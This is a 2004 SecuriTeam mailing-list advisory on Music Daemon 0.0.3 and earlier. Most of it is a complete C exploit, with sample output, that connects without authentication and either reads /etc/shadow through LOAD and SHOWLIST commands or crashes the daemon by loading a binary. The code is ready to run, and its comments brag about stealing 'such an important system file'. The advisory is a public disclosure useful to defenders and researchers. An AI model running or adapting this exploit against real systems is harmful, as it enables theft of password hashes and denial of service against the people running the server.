[UNIX] Music Daemon DoS and File Disclosure Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 08/26/04

  • Next message: SecuriTeam: "[UNIX] CDE LibDtHelp LOGNAME Buffer Overflow Vulnerability"
    To: list@securiteam.com
    Date: 26 Aug 2004 14:08:29 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Music Daemon DoS and File Disclosure Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://musicdaemon.sourceforge.net/about.xml> Music daemon (musicd) is a
    "music player designed to run as a independent server where different
    front-end can connect to control the play or get information about what is
    playing etc".

    Two remotely exploitable vulnerabilities have been found in the product,
    one allows attackers to cause the program to no longer respond to
    legitimate users, the other allows reading of sensitive files, such as the
    /etc/shadow file.

    DETAILS

    Vulnerable Systems:
     * MusicDaemon version 0.0.3 and prior

    Exploit:
    /* MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS
    * Vulnerability discovered by: Tal0n 05-22-04
    * Exploit code by: Tal0n 05-22-04
    *
    * Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded,
    wsxz,
    * serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky, brotroxer, xires,
    * bsdaemon, r4t, mal0, drug5t0r3, skilar, lostbyte, peanuter, and over_g
    *
    * MusicDaemon MUST be running as root, which it does by default anyways.
    * Tested on Slackware 9 and Redhat 9, but should work generically since
    the
    * nature of this vulnerability doesn't require
    * shellcode or return addresses.
    *
    *
    * Client Side View:
    *
    * root@vortex:~/test# ./md-xplv2 127.0.0.1 1234 shadow
    *
    * MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer
    *
    * Connected to 127.0.0.1:1234...
    * Sending exploit data...
    *
    * <*** /etc/shadow file from 127.0.0.1 ***>
    *
    * Hello
    * <snipped for privacy>
    * ......
    * bin:*:9797:0:::::
    * ftp:*:9797:0:::::
    * sshd:*:9797:0:::::
    * ......
    * </snipped for privacy>
    *
    * <*** End /etc/shadow file ***>
    *
    * root@vortex:~/test#
    *
    * Server Side View:
    *
    * root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p
    1234
    * Using configuration: ../musicd.conf
    * [Mon May 17 05:26:07 2004] cmd_set() called
    * Binding to port 5555.
    * [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555
    * [Mon May 17 05:26:07 2004] cmd_modulescandir() called
    * [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port
    1234.
    * [Mon May 17 05:26:11 2004] New connection!
    * [Mon May 17 05:26:11 2004] cmd_load() called
    * [Mon May 17 05:26:13 2004] cmd_show() called
    * [Mon May 17 05:26:20 2004] Client lost.
    *
    *
    * As you can see, it simply makes a connection, sends the commands, and
    * leaves. MusicDaemon doesn't even log that new connection's IPs that I
    * know of. Works very well, eh? :)
    *
    * The vulnerability is in where the is no authenciation for 1. For 2, it
    * will let you "LOAD" any file on the box if you have the correct
    privledges,
    * and by default, as I said before, it runs as root, unless you change the
    * configuration file to make it run as a different user.
    *
    * After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab
    * the contents of the actual file. You can subtitute any file you want in
    * for /etc/shadow, I just coded it to grab it because it being such an
    * important system file if you know what I mean ;).
    *
    * As for the DoS, if you "LOAD" any binary on the system, then use
    "SHOWLIST",
    * it will crash music daemon.
    *
    *
    */
      
      
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
      
    int main(int argc, char *argv[]) {
      
    char buffer[16384];
      
    char *xpldata1 = "LOAD /etc/shadow\r\n";
    char *xpldata2 = "SHOWLIST\r\n";
    char *xpldata3 = "CLEAR\r\n";
    char *dosdata1 = "LOAD /bin/cat\r\n";
    char *dosdata2 = "SHOWLIST\r\n";
    char *dosdata3 = "CLEAR\r\n";
      
    int len1 = strlen(xpldata1);
    int len2 = strlen(xpldata2);
    int len3 = strlen(xpldata3);
    int len4 = strlen(dosdata1);
    int len5 = strlen(dosdata2);
    int len6 = strlen(dosdata3);
      
    if(argc != 4) {
    printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow
    Stealer / DoS");
    printf("\nDiscovered and Coded by: Tal0n
    05-22-04\n");
    printf("\nUsage: %s <host> <port> <option>\n",
    argv[0]);
    printf("\nOptions:");
    printf("\n\t\tshadow - Steal /etc/shadow file");
    printf("\n\t\tdos - DoS Music Daemon\n\n");
    return 0; }
      
    printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow
    Stealer / DoS\n\n");
      
    int sock;
    struct sockaddr_in remote;
      
    remote.sin_family = AF_INET;
    remote.sin_port = htons(atoi(argv[2]));
    remote.sin_addr.s_addr = inet_addr(argv[1]);
      
    if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    printf("\nError: Can't create socket!\n\n");
    return -1; }
      
    if(connect(sock,(struct sockaddr *)&remote,
    sizeof(struct sockaddr)) < 0) {
    printf("\nError: Can't connect to %s:%s!\n\n",
    argv[1], argv[2]);
    return -1; }
      
    printf("Connected to %s:%s...\n", argv[1], argv[2]);
      
    if(strcmp(argv[3], "dos") == 0) {
      
    printf("Sending DoS data...\n");
      
    send(sock, dosdata1, len4, 0);
      
    sleep(2);
      
    send(sock, dosdata2, len5, 0);
      
    sleep(2);
      
    send(sock, dosdata3, len6, 0);
      
    printf("\nTarget %s DoS'd!\n\n", argv[1]);
      
    return 0; }
      
    if(strcmp(argv[3], "shadow") == 0) {
      
    printf("Sending exploit data...\n");
      
    send(sock, xpldata1, len1, 0);
      
    sleep(2);
      
    send(sock, xpldata2, len2, 0);
      
    sleep(5);
      
    printf("Done! Grabbing /etc/shadow...\n");
      
    memset(buffer, 0, sizeof(buffer));
    read(sock, buffer, sizeof(buffer));
      
    sleep(2);
      
    printf("\n<*** /etc/shadow file from %s ***>\n\n",
    argv[1]);
    printf("%s", buffer);
    printf("\n<*** End /etc/shadow file ***>\n\n");
      
    send(sock, xpldata3, len3, 0);
      
    sleep(1);
      
    close(sock);
      
    return 0; }
      
    return 0; }

    ADDITIONAL INFORMATION

    The information has been provided by Tal0n.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] CDE LibDtHelp LOGNAME Buffer Overflow Vulnerability"

    Relevant Pages

    • [NEWS] Ventrilo Denial of Service
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper packet handling within Ventrilo allow attackers to crash ... void ventrilo_udp_head_dec(unsigned char *data) ... void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short ...
      (Securiteam)
    • [EXPL] qwik-smtpd Format String
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ** The second problem was "fixed" using another char and then ... ** calling the int 0x80 syscall. ... void Usage; ...
      (Securiteam)
    • [EXPL] mtFTPd Server Format String (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... / discovered by darkeagle - xx.10.04 ... build_un(unsigned int retaddr, unsigned int offset, unsigned int base, ... main(int argc, char * argv) ...
      (Securiteam)
    • [EXPL] Samba "send_mailslot()" Buffer Overflow Vulnerability (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... void put_name(char *dest, const char *name, int pad, unsigned int ...
      (Securiteam)
    • [EXPL] Crystal FTP Pro Client LIST Proof of Concept
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... unsigned char reverseshell[] = ... void auth; ... void handle_cmd (int s, int connfd, char* ip); ...
      (Securiteam)